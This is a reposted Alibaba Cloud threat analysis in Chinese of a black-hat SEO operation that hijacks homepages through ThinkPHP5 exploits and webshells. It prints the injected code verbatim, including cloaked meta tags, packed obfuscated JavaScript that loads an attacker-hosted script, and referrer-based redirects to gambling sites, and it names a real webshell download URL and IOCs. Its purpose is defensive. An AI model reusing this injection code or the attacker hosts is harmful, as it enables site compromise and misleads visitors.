从入侵到变现——“黑洞”下的黑帽SEO分析
2019獨角獸企業(yè)重金招聘Python工程師標(biāo)準(zhǔn)>>>
概述
由于互聯(lián)網(wǎng)入口流量主要被搜索引擎占據(jù),網(wǎng)站在搜索引擎中的排名直接影響到市場營銷效果,因此SEO服務(wù)應(yīng)運(yùn)而生。SEO(Search Engine Optimization)全稱為搜索引擎優(yōu)化,是指利用搜索引擎的規(guī)則提高網(wǎng)站在相關(guān)搜索引擎內(nèi)的自然排名。SEO服務(wù)分為兩種:一種是合法的技術(shù)手段,通過站內(nèi)優(yōu)化、站外優(yōu)化、內(nèi)容建設(shè)等合理手段提升網(wǎng)站排名;第二種是使用作弊手段快速提升網(wǎng)站在搜索引擎內(nèi)的排名,比如使用蜘蛛池、暗鏈、站群、客戶端劫持、服務(wù)端劫持等黑客技術(shù)手段,這種通常稱為黑帽SEO。
黑帽SEO服務(wù)的對象通常為非法的產(chǎn)品或網(wǎng)站。與合法的SEO技術(shù)服務(wù)相比,黑帽SEO的效果非常快速,能夠在短時間內(nèi)提升排名進(jìn)行快速推廣,且推廣的網(wǎng)站內(nèi)容不受法律約束。黑客的主要目標(biāo)是牟取非法的經(jīng)濟(jì)利益,黑帽SEO是黑客快速變現(xiàn)的重要手段。在地下網(wǎng)絡(luò)世界已經(jīng)形成了一條完整的黑色產(chǎn)業(yè)鏈:黑客利用網(wǎng)站存在的安全漏洞,通過入侵手段獲取網(wǎng)站的控制權(quán)并植入后門,將后門出售給黑帽SEO運(yùn)營者,黑帽SEO通過暗鏈、網(wǎng)站劫持等技術(shù)手段篡改網(wǎng)站內(nèi)容,為黃、賭、賭等非法站點進(jìn)行搜索引擎推廣。
阿里云安全團(tuán)隊于近日跟蹤到了一個利用web漏洞入侵網(wǎng)站并通過劫持網(wǎng)站首頁進(jìn)行批量SEO推廣的黑產(chǎn)團(tuán)伙 。此黑產(chǎn)團(tuán)伙控制網(wǎng)站數(shù)量巨大,推廣的網(wǎng)站多為非法的網(wǎng)站,對互聯(lián)網(wǎng)產(chǎn)業(yè)存在巨大的危害。被入侵網(wǎng)站往往被植入多個后門,可被黑客重復(fù)利用,成為黑產(chǎn)的牟利工具,存在巨大的安全風(fēng)險。該黑產(chǎn)團(tuán)伙的上游黑客組織掌握了大量IP基礎(chǔ)設(shè)施,為了繞過安全防御,每天使用數(shù)千個代理/秒撥IP進(jìn)行瘋狂入侵。
由于該黑產(chǎn)團(tuán)伙控制的外部鏈接域名注冊郵箱均為dasheng123123@gmail.com,因此我們將其命名為DaSheng。
被控制網(wǎng)站分布
經(jīng)過長期跟蹤發(fā)現(xiàn),僅2019年1月到3月,該黑產(chǎn)團(tuán)伙就控制并利用了至少12700個站點。從被植入暗鏈網(wǎng)頁的頂級域名分布來看,".com"占比最多,占總數(shù)的72%。被植入暗鏈的網(wǎng)站存在為數(shù)不少的非營利組織/政府網(wǎng)站,絕大部分為地方性行業(yè)協(xié)會網(wǎng)站,但也有像中國XXX發(fā)展研究中、中國XXX發(fā)展聯(lián)盟等全國性協(xié)會網(wǎng)站。行業(yè)協(xié)會/政府網(wǎng)站具有較高公信力,黑帽SEO“傍”上這些網(wǎng)站能夠在搜索引擎里快速提高排名,但是發(fā)布的“黃賭毒“信息嚴(yán)重影響了網(wǎng)站的公信力。網(wǎng)站存在暗鏈也意味著存在嚴(yán)重的安全漏洞,如果不及時修復(fù)有可能引發(fā)重大的網(wǎng)絡(luò)安全事件。
圖1:被劫持網(wǎng)站頂級域名分布
圖2:某政府網(wǎng)站被植入暗鏈
黑帽SEO手法分析
該黑產(chǎn)團(tuán)伙通過被入侵網(wǎng)站的webshell后門在網(wǎng)站首頁的頭部插入如下代碼,該代碼會修改頁面title、keywords、description,并判斷瀏覽者是否是百度搜索引擎,如果不是搜索引擎則將網(wǎng)站titile修改為合法內(nèi)容,以達(dá)到隱藏自己的目的:
<title>北京赛车官网开奖_北京赛车开奖网站【实时更新】</title> <meta name="keywords" content="北京赛车开奖结果,北京赛车开奖记录,北京赛车开奖网站,北京赛车开奖直播,北京赛车开奖直播平台,北京赛车官方开奖,北京赛车开奖结果记录"/> <meta name="description" content="北京赛车官方开奖网站【YY234.COM】,时时精准提供北京赛车开奖记录,北京赛车开奖视频,北京赛车开奖结果,北京赛车在线直播,打造全网最佳的北京赛车开奖直播平台"/> <script>if(navigator.userAgent.toLocaleLowerCase().indexOf("baidu") == -1){document.title ="LEO YOUNG 李洋地板- By Orange NT"}</script> <script type="text/javascript">eval(function(p,a,c,k,e,d){e=function(c){return(c<a?"":e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)d[e(c)]=k[c]||e(c);k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1;};while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p;}('l["\\e\\c\\1\\m\\i\\8\\n\\0"]["\\7\\4\\9\\0\\8"](\'\\h\\2\\1\\4\\9\\3\\0 \\0\\j\\3\\8\\d\\6\\0\\8\\k\\0\\5\\f\\a\\r\\a\\2\\1\\4\\9\\3\\0\\6 \\2\\4\\1\\d\\6\\s\\0\\0\\3\\2\\q\\5\\5\\7\\7\\7\\b\\1\\3\\e\\a\\2\\p\\b\\1\\c\\i\\5\\j\\o\\1\\b\\f\\2\\6\\g\\h\\5\\2\\1\\4\\9\\3\\0\\g\');',29,29,'x74|x63|x73|x70|x72|x2f|x22|x77|x65|x69|x61|x2e|x6f|x3d|x64|x6a|x3e|x3c|x6d|x79|x78|window|x75|x6e|x6c|x38|x3a|x76|x68'.split('|'),0,{})) </script>被修改的內(nèi)容通過HTML的ASCII編碼隱藏,還原后為常見的關(guān)鍵詞:
titile:北京賽車官網(wǎng)開獎北京賽車開獎網(wǎng)站【實時更新】 keywords:北京賽車開獎結(jié)果北京賽車開獎記錄北京賽車開獎網(wǎng)站北京賽車開獎直播北京賽車開獎直播平臺北京賽車官方開獎北京賽車開獎結(jié)果記錄 description:北京賽車官方開獎網(wǎng)站【】時時精準(zhǔn)提供北京賽車開獎記錄北京賽車開獎視頻北京賽車開獎結(jié)果北京賽車在線直播打造全網(wǎng)最佳的北京賽車開獎直播平臺第二段js腳本是經(jīng)過混淆編碼的,執(zhí)行后得到新的js,并鏈接到黑產(chǎn)團(tuán)伙控制的外部javascript
< script type = "text/javascript" > eval(function(p, a, c, k, e, d) {e = function(c) {return (c < a ?"": e(parseInt(c / a))) + ((c = c % a) > 35 ?String.fromCharCode(c + 29) : c.toString(36))};if (!''.replace(/^/, String)) {while (c--) d[e(c)] = k[c] || e(c);k = [function(e) {return d[e]}];e = function() {return '\\w+'};c = 1;};while (c--) if (k[c]) p = p.replace(new RegExp('\\b' + e(c) + '\\b', 'g'), k[c]);return p; } ('l["\\e\\c\\1\\m\\i\\8\\n\\0"]["\\7\\4\\9\\0\\8"](\'\\h\\2\\1\\4\\9\\3\\0 \\0\\j\\3\\8\\d\\6\\0\\8\\k\\0\\5\\f\\a\\r\\a\\2\\1\\4\\9\\3\\0\\6 \\2\\4\\1\\d\\6\\s\\0\\0\\3\\2\\q\\5\\5\\7\\7\\7\\b\\1\\3\\e\\a\\2\\p\\b\\1\\c\\i\\5\\j\\o\\1\\b\\f\\2\\6\\g\\h\\5\\2\\1\\4\\9\\3\\0\\g\');', 29, 29, 'x74|x63|x73|x70|x72|x2f|x22|x77|x65|x69|x61|x2e|x6f|x3d|x64|x6a|x3e|x3c|x6d|x79|x78|window|x75|x6e|x6c|x38|x3a|x76|x68'.split('|'), 0, {})) < /script> /執(zhí)行后的js:
<script type="text/javascript" src="https://www.cpdas8.com/ylc.js"></script>該js代碼會自動向百度站長平臺和360站長平臺推送網(wǎng)頁內(nèi)容,并通過referrer判斷瀏覽者是否來自搜索引擎,如果是則跳轉(zhuǎn)到真實的被推廣網(wǎng)站。
(function () {/*百度推送代碼*/var bp = document.createElement('script');bp.src = '//push.zhanzhang.baidu.com/push.js';var s = document.getElementsByTagName("script")[0];s.parentNode.insertBefore(bp, s);/*360推送代碼*/var src = document.location.protocol + '//js.passport.qihucdn.com/11.0.1.js?8113138f123429f4e46184e7146e43d9';document.write('<script src="' + src + '" id="sozz"><\/script>');})();document.writeln("<script LANGUAGE=\"Javascript\">"); document.writeln("var s=document.referrer"); document.writeln("if(s.indexOf(\"baidu\")>0 || s.indexOf(\"sogou\")>0 || s.indexOf(\"soso\")>0 ||s.indexOf(\"sm\")>0 ||s.indexOf(\"uc\")>0 ||s.indexOf(\"bing\")>0 ||s.indexOf(\"yahoo\")>0 ||s.indexOf(\"so\")>0 )"); document.writeln("location.href=\"https://2019c2.com\";"); document.writeln("</script>");我們在搜索引擎中搜索其推廣的暗鏈關(guān)鍵詞,可以看到多個被入侵的網(wǎng)站在搜索引擎處在排名靠前的位置。
圖3:被黑帽SEO篡改的合法網(wǎng)站
攻擊向量
黑帽SEO團(tuán)伙使用的webshell后門通常是由上游的黑客組織提供,經(jīng)阿里云安全團(tuán)隊研究跟蹤到了DaSheng的最大“供貨商”。該黑客團(tuán)伙從2019年1月份開始變得異常活躍,主要使用2018年爆發(fā)的2個Thinkphp5遠(yuǎn)程代碼執(zhí)行漏洞,偶爾也會使用其它的web漏洞。根據(jù)其使用的webshell文件名和主要的入侵方式,我們將其命名為ThinkphpDD。
該團(tuán)伙的攻擊payload中會從http://43.255.29.112/php/dd.txt下載惡意代碼,該代碼是一個webshell后門。通常入侵成功幾天之后就會被DaSheng黑產(chǎn)團(tuán)伙利用,為了能夠長期控制站點,DaSheng會在被入侵網(wǎng)站的不同目錄植入多個webshell后門,該后門具備較強(qiáng)的免殺性。
?
圖4:被植入的webshell后門
黑客團(tuán)伙使用的攻擊payload:
IP基礎(chǔ)設(shè)施
通常攻擊者使用的IP由于存在惡意攻擊行為會被IPS、防火墻等安全設(shè)備攔截。ThinkphpDD為了繞過安全防護(hù)獲取最大的利益,使用了大量IP進(jìn)行網(wǎng)絡(luò)攻擊,從2019年1月開始每天使用幾千個IP進(jìn)行攻擊。而且使用的IP復(fù)用率低,被該團(tuán)伙利用過的IP已超過10萬個。使用過的IP絕大部分來自中國,占比89%。結(jié)合阿里云的代理IP威脅情報,至少有86%的IP是匿名代理或秒撥IP。可見該團(tuán)伙為了獲取黑產(chǎn)利益投入巨大。
圖5:黑客使用的IP數(shù)量趨勢
圖6:黑客攻擊次數(shù)趨勢
圖7:黑客使用的IP國家分布
圖8:黑客使用的IP來源分布
安全建議
1、用戶應(yīng)及時更新服務(wù),或修補(bǔ)網(wǎng)站漏洞,避免成為入侵的受害者;
2、用戶可對網(wǎng)站源代碼進(jìn)行檢測,及時清理被植入的網(wǎng)站后門、惡意代碼;
3、建議使用阿里云安全的下一代云防火墻產(chǎn)品,能夠及時阻斷惡意攻擊、配置智能策略,能夠有效幫助防御入侵;
4、對于有更高定制化要求的用戶,可以考慮使用阿里云安全管家服務(wù)。購買服務(wù)后將有經(jīng)驗豐富的安全專家提供咨詢服務(wù),定制適合您的方案,幫助加固系統(tǒng),預(yù)防入侵。
IOCs
www[.]cpdas8[.]com
www[.]bcdas8[.]com
www[.]dasv8[.]com
43.255.29.112
?
本文作者:桑鐸
原文鏈接
本文為云棲社區(qū)原創(chuàng)內(nèi)容,未經(jīng)允許不得轉(zhuǎn)載。
轉(zhuǎn)載于:https://my.oschina.net/u/3827390/blog/3041884
總結(jié)
以上是生活随笔為你收集整理的从入侵到变现——“黑洞”下的黑帽SEO分析的全部內(nèi)容,希望文章能夠幫你解決所遇到的問題。
- 上一篇: Nginx 搭建图片缓存服务器-转
- 下一篇: Oracle synonym 同义词